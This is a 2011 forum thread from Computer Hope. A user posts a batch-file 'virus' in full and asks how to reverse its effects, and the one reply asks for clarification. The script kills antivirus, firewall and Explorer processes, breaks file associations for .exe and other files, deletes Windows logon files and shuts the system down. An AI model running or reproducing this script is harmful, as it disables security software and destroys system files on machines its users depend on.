Computer Hope

Software => Computer viruses and spyware => Topic started by: ucsam on January 07, 2011, 07:43:47 PM

Title: bat virus
Post by: ucsam on January 07, 2011, 07:43:47 PM
hello everyone,
i am just a normal surfer, while i was going through a website and got a code like below:

title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:WINDOWSsystem32logoff.exe /F /Q
DEL C:WINDOWSsystem32logon.exe /F /Q
DEL C:WINDOWSsystem32logon.scr /F /Q
cls
shutdown


and it does the following things:

1. Ends Process, NAVAPSVC.exe
2. Ends Process, Explorer.exe (taskbar and icons will dissapear)
3. Ends Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

now i want to retrieve of what it has done. Can anyone help me?
i am not a virus maker but just a experimentist, Please help me.. :_:
Title: Re: bat virus
Post by: Allan on January 08, 2011, 06:21:17 AM
No idea what you are talking about. What is it you are trying to do?